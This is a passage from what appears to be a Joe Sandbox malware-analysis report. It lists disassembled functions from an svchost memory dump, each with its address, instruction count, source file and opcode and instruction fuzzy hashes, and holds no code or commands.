                                            • Opcode Fuzzy Hash: a51140e4b3c33dccd1baca5e0a7e9211dd1cbc8a339bc323443e3f4bac182357
                                            • Instruction Fuzzy Hash: 52F1C175900609DFDB14DFA8C980BAEB7B5FF48304F1886AAE815EB345E734DA45CB90
                                            Function 03A28397 Relevance: .4, Instructions: 380COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 14e75e358f1a09723d4d273bd3d76b0a0eccc906416f42f7285a237e64899909
                                            • Instruction ID: 939cfa0ea574c21447ad650e9f46939894ca7ff5000eaa234cc67455e4292d0b
                                            • Opcode Fuzzy Hash: 14e75e358f1a09723d4d273bd3d76b0a0eccc906416f42f7285a237e64899909
                                            • Instruction Fuzzy Hash: 22D1C575A007269FCB14DF68C990ABABBB9BF54304F08466FF816DB280E738D945C760
                                            Function 03A5C6E0 Relevance: .4, Instructions: 367COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: af788007d720981c2ddcd809ac01adda6874c23c630ef7df2aea005a9ff55447
                                            • Instruction ID: b2ffc979e7cadfe790f9783d28e1dbfa097eb35e5f5a32582f4532ce140d7aa8
                                            • Opcode Fuzzy Hash: af788007d720981c2ddcd809ac01adda6874c23c630ef7df2aea005a9ff55447
                                            • Instruction Fuzzy Hash: CAD16971E043199BEF28CF98C5847BDBBB6FB45320F18806FE942AB699D7748941CB44
                                            Function 03A438E0 Relevance: .3, Instructions: 349COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5410c8bf43a3cbe9b2bcd24f4c5d99b76ae36e1554b39ae63c944b738f609520
                                            • Instruction ID: 903f77be1ac4cbca7fe8baf5e9558ff801441611d76a48730291500461cb91d8
                                            • Opcode Fuzzy Hash: 5410c8bf43a3cbe9b2bcd24f4c5d99b76ae36e1554b39ae63c944b738f609520
                                            • Instruction Fuzzy Hash: 59E18D75A00205CFDB18CF59C990BAAB7F5FF98310F2881AEE855AB791D730E951CB90
                                            Function 03A3D7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a5f30605faa9238452d1ae9b346d32fcb01466614ddf09d838fb08675a92b04
                                            • Instruction ID: 91b341f987e0021196cfe70de431e38e2335d18662574aba47b70191637fdce5
                                            • Opcode Fuzzy Hash: 2a5f30605faa9238452d1ae9b346d32fcb01466614ddf09d838fb08675a92b04
                                            • Instruction Fuzzy Hash: 3FC17375E002159BEF14CF5AC940BAEF7B5EB59314F18826FE815AB390D774A942CB80
                                            Function 03A5D2F0 Relevance: .3, Instructions: 341COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d3d6c2a61c50af119dbf7a660be9dd8e78e4cce8ee85c1312ee98e55f77ac127
                                            • Instruction ID: f34cb40b1ddb78157855f8443b47a7af574673d3dfa63d5f3ce597643c0cd943
                                            • Opcode Fuzzy Hash: d3d6c2a61c50af119dbf7a660be9dd8e78e4cce8ee85c1312ee98e55f77ac127
                                            • Instruction Fuzzy Hash: D7B1D532A145148BEF1CCB18C8A137DB3A7EFE5221F1D82AFE8179F6D9D67899418341
                                            Function 03A40535 Relevance: .3, Instructions: 300COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                            • Instruction ID: e9098882c6ac9fdd2b330ae05871ab73bbd017513b3bbca89b0527953fd76a6d
                                            • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                            • Instruction Fuzzy Hash: F0B12435600645AFDF21DB68C940BBEFBF6EF89200F18459BD642AB381DB30E941DB90
                                            Function 03A590DB Relevance: .3, Instructions: 287COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4914fbd8ec3692c8f7878bc08d4f8b373f961683d4bb13091dadd7dd0d0973c6
                                            • Instruction ID: 866d99ded5bffed84e667a391d276ea3bec99fc0a362cf048515939d6cbaa721
                                            • Opcode Fuzzy Hash: 4914fbd8ec3692c8f7878bc08d4f8b373f961683d4bb13091dadd7dd0d0973c6
                                            • Instruction Fuzzy Hash: FDA14975900215AFEF26EFA4CC85FAFB7B9AF55750F05005AFA00AF2A0D7759850CBA0
                                            Function 03A383C0 Relevance: .3, Instructions: 281COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: befdeb9fb5d91676861ffe5249d53370050a301aec4a6d7fe08440b3cb12d4de
                                            • Instruction ID: eb15f13e897bb9a97d4ae893c550052aea872bc8d3120c3dc2290b1a5d3b8ed3
                                            • Opcode Fuzzy Hash: befdeb9fb5d91676861ffe5249d53370050a301aec4a6d7fe08440b3cb12d4de
                                            • Instruction Fuzzy Hash: 72C129745083418FDB64CF19C494BABB7E9BF88304F44496EF9899B390D778E909CB92
                                            Function 03A70185 Relevance: .3, Instructions: 276COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: db6254167b5318c7f9b9a1d8bb7c1ed3fae916c08aec39784e658436694685aa
                                            • Instruction ID: 9e72d4e71278ca5f4157e799e2c682b328f03e738fffbdb233227cac67a64f58
                                            • Opcode Fuzzy Hash: db6254167b5318c7f9b9a1d8bb7c1ed3fae916c08aec39784e658436694685aa
                                            • Instruction Fuzzy Hash: 6FA1AD75B0071A9BDB24DF69C9D0BAAB7F5FF54314F04412EEA459B281EB38E811CB90
                                            Function 03A4E3F0 Relevance: .3, Instructions: 261COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 947fb36a5e060a09797819a1a678409557156983d87ec5c6c2cee60559d3816c
                                            • Instruction ID: 618646c34ca37f1488ba31797c5deba8965c66d098195213fdd505bb64000b22
                                            • Opcode Fuzzy Hash: 947fb36a5e060a09797819a1a678409557156983d87ec5c6c2cee60559d3816c
                                            • Instruction Fuzzy Hash: 24910135A006219BEB24DB28D940F7AB7F5FBD4714F0985AFE805AB390E7349901C791
                                            Function 03A31131 Relevance: .3, Instructions: 259COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 79c1010253bd28f46d3ea2afa9c0fdf50b2f088f3b29b7cb68f58c5cb63ae22b
                                            • Instruction ID: 1293f88f4a53be13bdc3713b1f9bafad66cff684cf4c73a15f96e030c1fb2246
                                            • Opcode Fuzzy Hash: 79c1010253bd28f46d3ea2afa9c0fdf50b2f088f3b29b7cb68f58c5cb63ae22b
                                            • Instruction Fuzzy Hash: ECB10175A093418FD364DF28C580A5AFBF1BB89304F184A6EF899CB352D371E945CB82
                                            Function 03A64750 Relevance: .3, Instructions: 251COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                            • Instruction ID: fa3e5c381cb91660f8c375df9b4690646a393b1c2c4e0ae09f5ec8799434fd40
                                            • Opcode Fuzzy Hash: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                            • Instruction Fuzzy Hash: 86812736A047968FEF25CEAEC8C026DBB65EF57200B2C467FD4429B281C3659886C791
                                            Function 03A7DBF9 Relevance: .2, Instructions: 244COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                            • Instruction ID: f0340984e7fa6eaa61b4ace1006af130b2e4f9e81631243819cd7fa537f6a2bb
                                            • Opcode Fuzzy Hash: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                            • Instruction Fuzzy Hash: 37914E72621A06CFD725CF29CCC9662BBE0FF55324B188A1ED4E6DB6A1C375E511CB00
                                            Function 03AFF7B0 Relevance: .2, Instructions: 242COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6a41012268aa69f27374539dd91b455dd862c927d0d83430ede1bae10483d270
                                            • Instruction ID: 01503f04b2fd0598800241cb59883ffaea61dba819562c6fb28333244e799dae
                                            • Opcode Fuzzy Hash: 6a41012268aa69f27374539dd91b455dd862c927d0d83430ede1bae10483d270
                                            • Instruction Fuzzy Hash: 0C91E672A00206AFDB24CFA8C98076AB7F5EF44314F08857AFA55DB395D774E911CB90
                                            Function 03AFF43F Relevance: .2, Instructions: 241COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 05f00d3af0abcc9b514fe9d5be3a9b0dc7945333ddb375f697aeac1645c6a143
                                            • Instruction ID: f022357de8740576d0d3fb15a3755c349ab238af2a7a8b681eb5373cd651762d
                                            • Opcode Fuzzy Hash: 05f00d3af0abcc9b514fe9d5be3a9b0dc7945333ddb375f697aeac1645c6a143
                                            • Instruction Fuzzy Hash: 2191F172A001158FDB18CF69C8906BEBBF1FF88315F1982BAE955DB399D634DA01CB50
                                            Function 03AF81CC Relevance: .2, Instructions: 232COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 22a5b7cfcbe284a673675175eed5684f2da04755d8ce6e8ed55a3ceeeb404889
                                            • Instruction ID: 8c4456eeeb38421ec070c27743a91b4b01f2337a238bf0b6a1be87cd92bb8f03
                                            • Opcode Fuzzy Hash: 22a5b7cfcbe284a673675175eed5684f2da04755d8ce6e8ed55a3ceeeb404889
                                            • Instruction Fuzzy Hash: 4181A472E006159FCB18CFA9C8805AEB7F9FF88315B18436BE525E7290D778E951CB90
                                            Function 03A40E59 Relevance: .2, Instructions: 231COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 21b423466910033e4e2f516e980fe45ac0b6c6e77cb5b6cfb2ba329f9a40ad6a
                                            • Instruction ID: 34cacd0ab3d2399cb40dca3a90d50c8322ceddda70ef9754b515e61b4b52089d
                                            • Opcode Fuzzy Hash: 21b423466910033e4e2f516e980fe45ac0b6c6e77cb5b6cfb2ba329f9a40ad6a
                                            • Instruction Fuzzy Hash: AE819631A00659DFDB14CF69C88096EFBB6FFC5210B2882ABE9559B345D730E941DB90
                                            Function 03AEE4F6 Relevance: .2, Instructions: 224COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0a5b0cef1627c89b9cdd7086923615a7a57a4a7081e78a43f0e627e0cd72dbe6
                                            • Instruction ID: e2752ec3d02c3c374399e8ac3dbb7bd27bb707cc919de3001d1f3c723d3adaec
                                            • Opcode Fuzzy Hash: 0a5b0cef1627c89b9cdd7086923615a7a57a4a7081e78a43f0e627e0cd72dbe6
                                            • Instruction Fuzzy Hash: B6815F76E002159BCB18CF99C590AADFBF1EB89310F19816ED816EF385D7349941CB90
                                            Function 03AFAB40 Relevance: .2, Instructions: 222COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                            • Instruction ID: 5ea1e20f53b3448608d50d14848add573aa96921d58125c258e6c5a4f93292f5
                                            • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                            • Instruction Fuzzy Hash: 36816F35A102099FCF18DFD9C994AAEB7B6AF84314F18856EE91A9B344D734E902CF50
                                            Function 03A5D090 Relevance: .2, Instructions: 217COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                            • Instruction ID: d885c935b8e6630431087fa919aca82514e7fc5cc57b12eca0deb9c08de44dec
                                            • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                            • Instruction Fuzzy Hash: 6D817A76E001199FEF14CF69C980BADF7F2FB84344F19826BE816BB345D6359A408B91
                                            Function 03A6E284 Relevance: .2, Instructions: 212COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 61d4261e253ee1fb2b444870cd944de2256761f3e9c5e0faa648eab0ad2084c3
                                            • Instruction ID: ddfebbdbf9858d3ab1d2b175b8f0fae66f2d0ce98a8ca4ded2997f7db5374629
                                            • Opcode Fuzzy Hash: 61d4261e253ee1fb2b444870cd944de2256761f3e9c5e0faa648eab0ad2084c3
                                            • Instruction Fuzzy Hash: 89813C75A00709AFDB25CFA9C980EEEF7BAFB88354F14442EE556A7250D730AC45CB60
                                            Function 03A5B950 Relevance: .2, Instructions: 209COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 253aed21cfb25b98fd4b485c21fdbdda36271c2d75cf34028c370050bcf890a1
                                            • Instruction ID: 1a6c0cd97bf875577684958cdb2f0fc6787621413db842671f02118da320613c
                                            • Opcode Fuzzy Hash: 253aed21cfb25b98fd4b485c21fdbdda36271c2d75cf34028c370050bcf890a1
                                            • Instruction Fuzzy Hash: 0971D5342046509FEB24CF2AC940B36B7E1AB85705F18855FFE969B2D5D739E802CB70
                                            Function 03AEDAC6 Relevance: .2, Instructions: 202COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 21486e982505c48751967af532ac42dc8b8464fac475febd8e22f9800f4f3bd6
                                            • Instruction ID: 00713a7a9e90befc3e48a6ba8b99cd13caac4f5f7174c572e564f143eeed2c6a
                                            • Opcode Fuzzy Hash: 21486e982505c48751967af532ac42dc8b8464fac475febd8e22f9800f4f3bd6
                                            • Instruction Fuzzy Hash: 0D817C70D006A5DFDB24CFAAC488AAAFBF5EF89740F04849EE495AB285D374D841DF50
                                            Function 03AF70E9 Relevance: .2, Instructions: 201COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5fc4620d45d4aab1a96d91dcd28f72a5190d40a7787516c058f3c8b586638a49
                                            • Instruction ID: db727283c703c22efb48fa53f5f51d37d3ad98b7efec073b9110a4a50cd4ab5e
                                            • Opcode Fuzzy Hash: 5fc4620d45d4aab1a96d91dcd28f72a5190d40a7787516c058f3c8b586638a49
                                            • Instruction Fuzzy Hash: D661AF75E0031AAFCB14EFE5C980ABFB779AF44350F14452BFA11AB340EB75D9458A90
                                            Function 03A4260B Relevance: .2, Instructions: 201COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 31f8824dccb678eec6b4db7887e74bd6b9eaf3b759e8691488dbc2c4a465437f
                                            • Instruction ID: 9aad400b5309c16242ab39085b48ca08ee594cd2401684898c7cbbd90e3076e4
                                            • Opcode Fuzzy Hash: 31f8824dccb678eec6b4db7887e74bd6b9eaf3b759e8691488dbc2c4a465437f
                                            • Instruction Fuzzy Hash: 5A719A356046419FD715DF28C580B2AF7E5FFC9210F0989ABF8988B362DB78D846CB91
                                            Function 03AEF0CC Relevance: .2, Instructions: 199COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c00640a0106b65aae920ec11854c253dc96c92a6a5c5fefcd5b74a00b6cac1a4
                                            • Instruction ID: ede831d5afe994e44e74676cf927a738d0ff1e263c7c2436a0bb2558d7f04a30
                                            • Opcode Fuzzy Hash: c00640a0106b65aae920ec11854c253dc96c92a6a5c5fefcd5b74a00b6cac1a4
                                            • Instruction Fuzzy Hash: 28719C79A01626DFCB28CF5AC48017AF3F1FF84705B6A496FD98297640D374E980CB90
                                            Function 03AB035C Relevance: .2, Instructions: 198COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                            • Instruction ID: 410027a447294b0fe076a5467849a7f6c2d4b3fe59bc60b5e2ff0c919b694c4a
                                            • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                            • Instruction Fuzzy Hash: 6F716275E00619AFCB10DFA5CA44EDEBBB8FF84700F14456AE505AB351DB34EA05CB50
                                            Function 03AC62A0 Relevance: .2, Instructions: 198COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0e5d9382b475e83bddac0287749266de039603773d4f9e07558f3bf107048513
                                            • Instruction ID: 22ea239124a80a6c05ae2f3629092a5b100deeb4a02c2c3ceea74d3df88ce04a
                                            • Opcode Fuzzy Hash: 0e5d9382b475e83bddac0287749266de039603773d4f9e07558f3bf107048513
                                            • Instruction Fuzzy Hash: DC71F036250B41AFDB31DF14CA84FAAB7B5EF84720F18492EE2569B2B0D774E944CB50
                                            Function 03AF7A46 Relevance: .2, Instructions: 193COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fe064efae241bba083a45b10b87e640edcb3c620a0ef15e61de8662abdf17c00
                                            • Instruction ID: eda54f14327f02ee44bd8bfb20e6eed1e3434448bc382ea5fe8b1e3a8b82b10c
                                            • Opcode Fuzzy Hash: fe064efae241bba083a45b10b87e640edcb3c620a0ef15e61de8662abdf17c00
                                            • Instruction Fuzzy Hash: 37513B75A002255FCB14DFA9C980ABAF7F6EF88350B18416EFE55DB384DA35C902C7A0
                                            Function 03AF132D Relevance: .2, Instructions: 188COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b196f64b83055bf841cf71f0ec4957dc095e6bbc8f0183c734c4aa9c3cbf4852
                                            • Instruction ID: 89148de5321adbf616ebf5eb64088e53e4f8ec86c4a2f389848cef960d1f55bb
                                            • Opcode Fuzzy Hash: b196f64b83055bf841cf71f0ec4957dc095e6bbc8f0183c734c4aa9c3cbf4852
                                            • Instruction Fuzzy Hash: FC816D75A00205DFCB09CF99C590AAEB7F1FF88304F1981AAE859EB345D734EA41CB90
                                            Function 03AF903E Relevance: .2, Instructions: 186COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 875d6946d9e85bea22189d46ab6052df7df89fd44149fcdebdaf4934939f957a
                                            • Instruction ID: 81f3248298b1a5ed30268890f52c4dd8d2a4cfb4b5b92e4622d7b4aea49a1421
                                            • Opcode Fuzzy Hash: 875d6946d9e85bea22189d46ab6052df7df89fd44149fcdebdaf4934939f957a
                                            • Instruction Fuzzy Hash: 3661DE75600715AFD765DFA5C984BABFBA8FF88710F04462EFA598B240DB30E510CBA1
                                            Function 03AFFCF2 Relevance: .2, Instructions: 181COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1200870572b50c7b8a3589c3cd410c2042a2d007d6f77e5bd910ca4a60a41bad
                                            • Instruction ID: 5ea9d18345f16e2ddd22d1805dc22fab155decfaf1b9ec67db3131377d7a6022
                                            • Opcode Fuzzy Hash: 1200870572b50c7b8a3589c3cd410c2042a2d007d6f77e5bd910ca4a60a41bad
                                            • Instruction Fuzzy Hash: 4261B331A0020A9FCB14DFA8C980ABEF7F5FF48318F14466AF655EB284D734A955CB50
                                            Function 03A37703 Relevance: .2, Instructions: 179COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a3de7bfd220899a245adaf27acc33cb3ed554d7c128db9940cd4549b1d5f1279
                                            • Instruction ID: 71c0c36b114e8567936c3ee2240cb89420d5a52c6967ea6fe967638005a442a9
                                            • Opcode Fuzzy Hash: a3de7bfd220899a245adaf27acc33cb3ed554d7c128db9940cd4549b1d5f1279
